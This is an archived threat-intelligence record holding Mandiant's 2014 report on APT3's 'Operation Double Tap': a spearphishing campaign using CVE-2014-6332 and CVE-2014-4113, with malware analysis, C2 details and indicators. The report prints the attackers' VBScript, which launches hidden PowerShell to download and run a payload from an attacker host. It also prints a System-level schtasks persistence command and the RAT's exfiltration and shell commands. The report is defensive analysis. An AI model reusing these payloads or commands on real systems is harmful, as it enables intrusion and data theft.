{ "id": "649517bc-0962-4958-a7ff-e1530cc0f4bf", "created_at": "2026-04-06T00:09:42.456486Z", "updated_at": "2026-04-10T03:37:26.216883Z", "deleted_at": null, "sha1_hash": "fe5038eef3441bac0276cba4f5ef6c0ef504ccf9", "title": "Operation Double Tap | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 63515, "plain_text": "Operation Double Tap | Mandiant\r\nBy Mandiant\r\nPublished: 2014-11-21 · Archived: 2026-04-05 14:31:17 UTC\r\nWritten by: Ned Moran, Mike Scott, Mike Oppenheim, Joshua Homan\r\nAPT3 (also known as UPS), the actors responsible for Operation Clandestine Fox has quietly continued to send\r\nwaves of spearphishing messages over the past few months. This actor initiated their most recent campaign on\r\nNovember 19, 2014 targeting multiple organizations. The attacker leveraged multiple exploits, targeting both\r\nCVE-2014-6332 and CVE-2014-4113. CVE-2014-6332 was disclosed publicly on 2014-11-11 and is a Windows\r\nOLE Automation Array Remote Code Execution vulnerability. CVE-2014-4113 is a privilege escalation\r\nvulnerability that was disclosed publicly on 2014-10-14.\r\nThe use of CVE-2014-6332 is notable, as it demonstrates that multiple classes of actors, both criminal and APT\r\nalike, have now incorporated this exploit into their toolkits. Further, the use of both of these two known\r\nvulnerabilities in tandem is notable for APT3. This actor is historically known for leveraging zero-day\r\nvulnerabilities in widespread but infrequent phishing campaigns. The use of known exploits and more frequent\r\nattacks may indicate both a shift in strategy and operational tempo for this group.\r\nThe Spearphish\r\nThe body of the message is below:\r\nOne Month's Free Membership for The PLAYBOY ClUB 1080P HD VIDEOS 100,000 PHOTOS 4,000 MODELS\r\nNude Celebrities,Playmates,Cybergirls \u0026 More! Click hxxp://join.playboysplus.com/signup/ To Get a Free Plus\r\nMember Now \u0026 Never Miss Another Update. Your Member referrals must remain active. If anyone getting\r\n\"Promotion not available\" for 1 month free membership, you might get the issue up to 48 hrs once your\r\nmembership is expired and make sure to Clear out cookies or use another browser or use another PC.\r\nThe webpage contained both CVE-2014-6332 exploit code and a VBScript that invoked PowerShell on the\r\naffected users’ system to download the below payload:\r\nfunction runmumaa()\r\nOn Error Resume Next\r\nset shell=createobject(\"Shell.Application\")\r\nshell.ShellExecute \"powershell.exe\",\"-NoLogo -NoProfile -NonInteractive -WindowStyle Hidden ( New-Object\r\n“System.Net.WebClient”).DownloadFile(“http://www.playboysplus.com /install/install.exe”,”install.exe”);Invoke-Item install.exe\", \"\", \"open\", 1\r\nend function\r\nhttps://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html\r\nPage 1 of 5\n\nThe CVE-2014-6332 exploit code seen in this incident is derived from the code published at http://www.exploit-db.com/exploits/35230/, which has also been incorporated in the Metasploit project.\r\nThe Downloader\r\nAfter the exploit or script executes, the system downloads install.exe, which has the following metadata:\r\nMD5 5a0c4e1925c76a959ab0588f683ab437\r\nSize 46592 bytes\r\nCompile Time 2014-11-19 08:55:10Z\r\nImport Hash 6b8611f8148a6b51e37fd68e75b6a81c\r\nThe file install.exe attempts to write two files (doc.exe and test.exe) to the hard-coded path “C:\\Users\\Public”,\r\nwhich fails on Windows XP because that path is not present by default.\r\nThe first dropped file, doc.exe, contains the CVE-2014-4113 exploit and then attempts to execute test.exe with the\r\nelevated privileges. These files have the following metadata:\r\ndoc.exe (x86):\r\nMD5 492a839a3bf9c61b7065589a18c5aa8d\r\nSize 12288 bytes\r\nImport Hash 9342d18e7d315117f23db7553d59a9d1\r\ndoc.exe (x64):\r\nMD5 744a17a3bc6dbd535f568ef1e87d8b9a\r\nSize 13824 bytes\r\nCompile Time 2014-11-19 08:25:45Z\r\nImport Hash 2fab77a3ff40e4f6d9b5b7e813c618e4\r\ntest.exe:\r\nMD5 5c08957f05377004376e6a622406f9aa\r\nSize 11264 bytes\r\nCompile Time 2014-11-18 10:49:23Z\r\nImport Hash f34d5f2d4577ed6d9ceec516c1f5a744\r\nThese payload files also have interesting PDB debug strings.\r\nhttps://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html\r\nPage 2 of 5\n\ninstall.exe:\r\nc:\\Users\\aa\\Documents\\Visual Studio 2008\\Projects\\MShell\\Release \\MShell.pdb\r\ndoc.exe:\r\nc:\\Users\\aa\\Documents\\Visual Studio 2008\\Projects\\4113\\Release \\4113.pdb\r\ntest.exe:\r\nC:\\Users\\aa\\Documents\\Visual Studio 2010\\Projects\\MyRat\\Client\\Client \\obj\\x86\\Release\\Client.pdb\r\nThe most interesting PDB string is the “4113.pdb,” which appears to reference CVE-2014-4113. This CVE is a\r\nlocal kernel vulnerability that, with successful exploitation, would give any user SYSTEM access on the machine.\r\nThe malware component, test.exe, uses the Windows command \"cmd.exe\" /C whoami” to verify it is running with\r\nthe elevated privileges of “System” and creates persistence by creating the following scheduled task:\r\nschtasks /create /tn \"mysc\" /tr C:\\Users\\Public\\test.exe /sc ONLOGON /ru \"System\"\r\nWhen executed, the malware first establishes a SOCKS5 connection to 192.157.198.103 using TCP port 1913.\r\nThe malware sends the SOCKS5 connection request \"05 01 00\" and verifies the server response starts with \"05\r\n00\". The malware then requests a connection to 192.184.60.229 on TCP port 81 using the command \"05 01 00 01\r\nc0 b8 3c e5 00 51\" and verifies that the first two bytes from the server are \"05 00\" (c0 b8 3c e5 is the IP address\r\nand 00 51 is the port in network byte order).\r\nOnce the connection to the server is established, the malware expects a message containing at least three bytes\r\nfrom the server. These first three bytes are the command identifier. The following commands are supported by the\r\nmalware:\r\nCommand\r\nID\r\nDescription\r\n00 00 00\r\nContent after command ID is written to:\r\nC:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad1.exe\r\n00 00 01\r\nDeletes the files:\r\nC:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad.exe\r\nC:\\Users\\[Username]\\AppData\\Local\\Temp\\newnotepad.exe\r\n00 00 02 Malware exits\r\n00 00 03\r\nMalware downloads the URL that follows the command ID. The file is saved to:\r\nhttps://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html\r\nPage 3 of 5\n\nC:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad.exe\r\n00 00 04\r\nContent after command ID is written to:\r\nC:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad2.exe\r\n00 00 05\r\nThe files notepad1.exe and notepad2.exe are concatenated together and written to C:\\Users\\\r\n[Username]\\AppData\\Local\\Temp\\newnotepad.exe and executed\r\n00 00 06\r\nThe contents of the following file is sent to the server:\r\nC:\\Users\\[Username]\\AppData\\Local\\Temp\\note.txt\r\n00 00 07 The string following the command ID is executed using \"cmd /C\" and results are sent to server\r\nLinks to APT3\r\nOn October 28, we observed APT3 sending out spearphishing messages containing a compressed executable\r\nattachment. The deflated exe was a variant of the same downloader described above and connected to\r\n198.55.115.71 over port 1913 via SOCKS5 proxy. The secondary payload in that case was detected as\r\nBackdoor.APT.CookieCutter (aka Pirpi) and also named newnotepad.exe (MD5\r\n8849538ef1c3471640230605c2623c67) and connected to the known APT3 domains:\r\ninform.bedircati[.]com\r\npn.lamb-site[.]com\r\n210.109.99.64\r\nThe 192.184.60.229 IP address seen in this current campaign also hosts securitywap[.]com – another known\r\ndomain referenced in our Operation Clandestine Fox blog.\r\nDOMAIN FIRST SEEN LAST SEEN IP ADDRESS\r\nsecuritywap.com 2014-11-17 2014-11-20 192.184.60.229\r\nwww.securitywap.com 2014-11-17 2014-11-20 192.184.60.229\r\nIn addition, the join.playboysplus[.]com exploit and payload delivery site resolves to 104.151.248.173.\r\nThis IP has hosted other domains used by APT3 in past campaigns:\r\nDOMAIN FIRST SEEN LAST SEEN IP ADDRESS\r\njoin.playboysplus[.]com 2014-11-21 2014-11-21 104.151.248.173\r\nhttps://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html\r\nPage 4 of 5\n\nwalterclean[.]com 2014-11-18 2014-11-20 104.151.248.173\r\nwww.walterclean[.]com 2014-11-18 2014-11-20 104.151.248.173\r\nAs we discussed in our previous blog detailing previous APT3 activity, the walterclean[.]com served as a\r\nPlugx/Kaba command and control server.\r\nConclusion\r\nAlthough APT3 is well known for employing zero-day exploits in their attacks, recent activity has demonstrated\r\nthat they will also attack targets with known exploits or social engineering.\r\nSince Operation Clandestine Fox, we have observed this actor execute multiple attacks that did not rely on zero-day exploits. The combination of this sustained operational tempo and lack of zero-day exploits may\r\nindicate that this group has changed strategy and has decided to attack more frequently and does not have\r\nsteady access to zero-day exploit code. No matter the strategy, this actor has shown an ability to operate\r\nsuccessfully.\r\nHere's the IOCs for this threat.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html\r\nhttps://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "Malpedia", "ETDA" ], "references": [ "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html" ], "report_names": [ "operation_doubletap.html" ], "threat_actors": [ { "id": "13354d3f-3f40-44ec-b42a-3cda18809005", "created_at": "2022-10-25T15:50:23.275272Z", "updated_at": "2026-04-10T02:00:05.36519Z", "deleted_at": null, "main_name": "APT3", "aliases": [ "APT3", "Gothic Panda", "Pirpi", "UPS Team", "Buckeye", "Threat Group-0110", "TG-0110" ], "source_name": "MITRE:APT3", "tools": [ "OSInfo", "schtasks", "PlugX", "LaZagne", "SHOTPUT", "RemoteCMD" ], "source_id": "MITRE", "reports": null }, { "id": "761d1fb2-60e3-46f0-9f1c-c8a9715967d4", "created_at": "2023-01-06T13:46:38.269054Z", "updated_at": "2026-04-10T02:00:02.90356Z", "deleted_at": null, "main_name": "APT3", "aliases": [ "GOTHIC PANDA", "TG-0110", "Buckeye", "Group 6", "Boyusec", "BORON", "BRONZE MAYFAIR", "Red Sylvan", "Brocade Typhoon" ], "source_name": "MISPGALAXY:APT3", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "cf826655-5fcb-4331-bdc5-5ef267db9d3c", "created_at": "2025-08-07T02:03:24.631402Z", "updated_at": "2026-04-10T02:00:03.608938Z", "deleted_at": null, "main_name": "BRONZE MAYFAIR", "aliases": [ "APT3 ", "Gothic Panda ", "Pirpi", "TG-0110 ", "UPSTeam" ], "source_name": "Secureworks:BRONZE MAYFAIR", "tools": [ "Cookiecutter", "HUC Proxy Malware (Htran)", "Pirpi", "PlugX", "SplitVPN", "UPS", "ctt", "ctx" ], "source_id": "Secureworks", "reports": null }, { "id": "06f622cb-3a78-49cf-9a4c-a6007a69325f", "created_at": "2022-10-25T16:07:23.315239Z", "updated_at": "2026-04-10T02:00:04.537826Z", "deleted_at": null, "main_name": "APT 3", "aliases": [ "APT 3", "Boron", "Brocade Typhoon", "Bronze Mayfair", "Buckeye", "G0022", "Gothic Panda", "Group 6", "Operation Clandestine Fox", "Operation Clandestine Fox, Part Deux", "Operation Clandestine Wolf", "Operation Double Tap", "Red Sylvan", "TG-0110", "UPS Team" ], "source_name": "ETDA:APT 3", "tools": [ "APT3 Keylogger", "Agent.dhwf", "BKDR_HUPIGON", "Backdoor.APT.CookieCutter", "Badey", "Bemstour", "CookieCutter", "Destroy RAT", "DestroyRAT", "DoublePulsar", "EXL", "EternalBlue", "HTran", "HUC Packet Transmit Tool", "Hupigon", "Hupigon RAT", "Kaba", "Korplug", "LaZagne", "MFC Huner", "OSInfo", "Pirpi", "PlugX", "RedDelta", "RemoteCMD", "SHOTPUT", "Sogu", "TIGERPLUG", "TTCalc", "TVT", "Thoper", "Xamtrav", "remotecmd", "shareip", "w32times" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434182, "ts_updated_at": 1775792246, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/fe5038eef3441bac0276cba4f5ef6c0ef504ccf9.pdf", "text": "https://archive.orkl.eu/fe5038eef3441bac0276cba4f5ef6c0ef504ccf9.txt", "img": "https://archive.orkl.eu/fe5038eef3441bac0276cba4f5ef6c0ef504ccf9.jpg" } }